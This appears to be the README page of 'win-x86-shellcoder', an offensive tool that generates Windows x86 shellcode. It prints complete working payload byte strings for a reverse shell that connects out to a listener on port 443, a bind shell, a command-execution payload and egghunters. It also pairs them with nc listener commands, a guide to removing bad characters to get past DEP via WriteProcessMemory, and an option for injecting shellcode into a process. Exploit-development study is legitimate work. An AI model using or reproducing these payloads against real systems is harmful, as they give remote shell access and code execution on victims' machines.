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win-x86-shellcoder's Introduction

Windows x86 Shellcode Generator


$ python3 -h
usage: [-h] [-b BADCHARS] [-r] [-w] [-e {process,thread,none}] {reverse,bind,exec,egghunter,loadfile} ...

Windows x86 Shellcode Generator

positional arguments:
                        Shellcode mode
    reverse             Generate reverse shell shellcode
    bind                Generate bind shell shellcode
    exec                Generate execute command shellcode
    egghunter           Generate egghunter shellcode
    loadfile            Load shellcode from file

  -h, --help            show this help message and exit
  -b BADCHARS, --badchars BADCHARS
                        Characters to avoid
  -r, --run_shellcode   Inject shellcode into a current Python process
  -w, --use_windbg      Insert int3 for debugger into shellcode
  -e {process,thread,none}, --exit_func {process,thread,none}
                        Function called to terminate shellcode


Reverse Shell

nc -nlvp 443
$ python3 -b '\x00\x08\x09\x0A\x0B\x0D\x20\x23\x25\x26\x2E\x2F\x3D\x3F\x5C' reverse -i -p 443
# shellcode size: 0x15f (351)
shellcode = b'\x89\xe5\x81\xc4\xf0\xf9\xff\xff\xeb\x06^\x89u\x04\xebR\xe8\xf5\xff\xff\xff`1\xc9d\x8bq0\x8bv\x0c\x8bv\x1cVF\x8b^\x07N\x0f\xb6F\x1e\x89E\xf8\x8bC<\x8b|\x03x\x01\xdf\x8bO\x18O\x8bG!G\x01\xd8\x89E\xfc\xe3\x1dI\x8bE\xfc\x8b4\x88\x01\xde1\xc0\x8bU\xf8\xfc\xac\x84\xc0t\x0e\xc1\xca\x0e\x01\xc2\xeb\xf4\xeb+^\x8b6\xeb\xb9;T$(u\xd6\x8bW$\x01\xdaf\x8b\x0cJ\x8bW\x1c\x01\xda\x8b\x04\x8a\x01\xd8L\x89D$!D^aYZQ\xff\xe0\xb8\xb4\xb3\xff\xfe\xf7\xd8P\xb8\xcd\xcd\xd1\xbb\xf7\xd8PhWS2_Th\xf9\x1d\x7f\xc3\xffU\x04\x89\xe01\xc9f\xb9\x90\x05)\xc8P1\xc0f\xb8\x02\x02Ph\x1e\x9a\x0c0\xffU\x041\xc0PPP\xb0\x06P,\x05P@Ph\xff\x9aH\x1a\xffU\x04\x89\xc61\xc0PPh\xc0\xa8\x01xf\xb8\x01\xbb\xc1\xe0\x10f\x83\xc0\x02PT_1\xc0PPPP\x04\x10PWVh2\xa6\xc3\x1a\xffU\x04VVV1\xc0H\x8dH\x0e@P\xe2\xfd\xb0DPT_f\xc7G,\x01\x01\xb8\x9b\x87\x9a\xff\xf7\xd8P\xb8\x9d\x92\x9b\xd1\xf7\xd8P\x89\xe3\x89\xe01\xc9f\xb9\x90\x03)\xc8PW1\xc0PPP@PHPPSPh\x98\xb1\x89\xef\xffU\x041\xc9Qj\xffh\xc2Y\xfc\xe6\xffU\x04'

Bind Shell

$ python3 -b '\x00\x08\x09\x0A\x0B\x0D\x20\x23\x25\x26\x2E\x2F\x3D\x3F\x5C' bind -p 54321
# shellcode size: 0x170 (368)
shellcode = b'\x89\xe5\x81\xc4\xf0\xf9\xff\xff\xeb\x06^\x89u\x04\xebR\xe8\xf5\xff\xff\xff`1\xc9d\x8bq0\x8bv\x0c\x8bv\x1cVF\x8b^\x07N\x0f\xb6F\x1e\x89E\xf8\x8bC<\x8b|\x03x\x01\xdf\x8bO\x18O\x8bG!G\x01\xd8\x89E\xfc\xe3\x1dI\x8bE\xfc\x8b4\x88\x01\xde1\xc0\x8bU\xf8\xfc\xac\x84\xc0t\x0e\xc1\xca)\x01\xc2\xeb\xf4\xeb+^\x8b6\xeb\xb9;T$(u\xd6\x8bW$\x01\xdaf\x8b\x0cJ\x8bW\x1c\x01\xda\x8b\x04\x8a\x01\xd8L\x89D$!D^aYZQ\xff\xe0\xb8\xb4\xb3\xff\xfe\xf7\xd8P\xb8\xcd\xcd\xd1\xbb\xf7\xd8PhWS2_Th\xca\xcc~E\xffU\x04\x89\xe01\xc9f\xb9\x90\x05)\xc8P1\xc0f\xb8\x02\x02Ph\xb8\xe0i\xa1\xffU\x041\xc0PPP\xb0\x06P,\x05P@Ph\xa9\x1f\xbe\xc0\xffU\x04\x89\xc61\xc0PPPf\xb8\xd41\xc1\xe0\x10\x04\x02PT_1\xc0\x04\x10PWVh\xa5L\x1a\x97\xffU\x041\xc0PVh\xd4f\xfd\xc5\xffU\x041\xc0PPVh\xda\xa4!k\xffU\x04\x89\xc6VVV1\xc0H\x8dH\x0e@P\xe2\xfd\xb0DPT_f\xc7G,\x01\x01\xb8\x9b\x87\x9a\xff\xf7\xd8P\xb8\x9d\x92\x9b\xd1\xf7\xd8P\x89\xe3\x89\xe01\xc9f\xb9\x90\x03)\xc8PW1\xc0PPP@PHPPSPh<\xc6ry\xffU\x041\xc9Qj\xffh\xc6\xbaHp\xffU\x04'
nc -nv 54321

Execute Command

$ python3 -b '\x00\x08\x09\x0A\x0B\x0D\x20\x23\x25\x26\x2E\x2F\x3D\x3F\x5C' exec -c 'calc'
# shellcode size: 0xba (186)
shellcode = b'\x89\xe5\x81\xc4\xf0\xf9\xff\xff\xeb\x06^\x89u\x04\xebR\xe8\xf5\xff\xff\xff`1\xc9d\x8bq0\x8bv\x0c\x8bv\x1cVF\x8b^\x07N\x0f\xb6F\x1e\x89E\xf8\x8bC<\x8b|\x03x\x01\xdf\x8bO\x18O\x8bG!G\x01\xd8\x89E\xfc\xe3\x1dI\x8bE\xfc\x8b4\x88\x01\xde1\xc0\x8bU\xf8\xfc\xac\x84\xc0t\x0e\xc1\xca\x03\x01\xc2\xeb\xf4\xeb+^\x8b6\xeb\xb9;T$(u\xd6\x8bW$\x01\xdaf\x8b\x0cJ\x8bW\x1c\x01\xda\x8b\x04\x8a\x01\xd8L\x89D$!D^aYZQ\xff\xe0\xb8\x01\x02\x02\x025\x01\x03\x03\x03Phcalc\x89\xe11\xd2RQhq\x90H\xaa\xffU\x041\xc9Qj\xffh\x97\xaae}\xffU\x04'


Use ntaccess

$ python3 -b '\x00' egghunter ntaccess -t w00tw00t
# shellcode size: 0x24 (36)
shellcode = b'f\x81\xca\xff\x0fBR\xb8:\xfe\xff\xff\xf7\xd8\xcd.<\x05Zt\xeb\xb8w00t\x89\xd7\xafu\xe6\xafu\xe3\xff\xe7'


$ python3 -b '\x00' egghunter seh -t w00tw00t
# shellcode size: 0x45 (69)
shellcode = b'\xeb*Y\xb8w00tQj\xff1\xdbd\x89#\x83\xe9\x04\x83\xc3\x04d\x89\x0bj\x02Y\x89\xdf\xf3\xafu\x07\xff\xe7f\x81\xcb\xff\x0fC\xeb\xed\xe8\xd1\xff\xff\xffj\x0cY\x8b\x04\x0c\xb1\xb8\x83\x04\x08\x06X\x83\xc4\x10P1\xc0\xc3'

Bypass DEP with WriteProcessMemory

This tool was created to facilitate developing shellcodes that do not contain bad characters and do not require decoding to bypass DEP with WriteProcessMemory.

Suppose VirtualAlloc or VirtualProtect cannot be used and WriteProcessMemory must be used. In that case, encoders that perform dynamic decoding such as shikata_ga_nai will likely not work because the address to which WriteProcessMemory writes the shellcode will remain not writable, making it impossible to write dynamically decoded shellcode.

One solution to this problem is to develop a shellcode that does not contain bad characters and does not require decoding.

Find Bad Characters

-b is an option to specify bad characters. The specified bad characters are automatically removed from function name hashes and some instructions in the shellcode. If any remaining bad characters cannot be removed, the output will indicate which instructions contain bad characters as [x].

$ python3 -b '\x00\x08\x09\x0A\x0B\x0C\x0D\x20\x23\x25\x26\x2B\x2E\x2F\x3D\x3F\x5C' reverse -i -p 443
# bad chars were found in the shellcode
[ ] ebf4         : jmp 0x58
[x] eb2b         : jmp 0x91
[ ] 5e           : pop esi
[ ] 8b36         : mov esi, dword ptr [esi]
[ ] ebb9         : jmp 0x24
[ ] 3b542428     : cmp edx, dword ptr [esp + 0x28]
[ ] 75d6         : jne 0x47
[ ] 8b5724       : mov edx, dword ptr [edi + 0x24]
[ ] 01da         : add edx, ebx
[x] 668b0c4a     : mov cx, word ptr [edx + ecx*2]
[ ] 8b571c       : mov edx, dword ptr [edi + 0x1c]

Replace Instructions

We can manually remove the remaining bad characters by replacing the detected instruction with another instruction. For example, 0x0C and 0x2B can be removed by replacing the instructions in as follows.

    jmp   compute_hash_again        // Next iteration

    jmp   find_and_call_end
    nop                             // * REMOVE 0x2B *
    nop                             // * REMOVE 0x2B *

    pop   esi                       // Restore InInitOrder
    mov   esi, [esi]                // ESI = InInitOrder[X].flink (next)
    jmp   next_module

    cmp   edx, [esp+0x28]           // Compare the computed hash with the requested hash
    jnz   find_function_loop        // If it doesn't match go back to find_function_loop
    mov   edx, [edi+0x24]           // AddressOfNameOrdinals RVA
    add   edx, ebx                  // AddressOfNameOrdinals VMA
    //; mov   cx,  [edx+2*ecx]          // Extrapolate the function's ordinal
    mov   ax,  [edx+2*ecx]          // * REMOVE 0x0C *
    mov   cx, ax                    // * REMOVE 0x0C *
    mov   edx, [edi+0x1C]           // AddressOfFunctions RVA

Debug Shellcode (for Windows Only)

Inject shellcode into a Python process

-r, --run_shellcode

python3 -r reverse -i -p 443

Insert int3 for debugger into shellcode

-w, --use_windbg

python3 -r -w reverse -i -p 443

win-x86-shellcoder's People


ommadawn46 avatar

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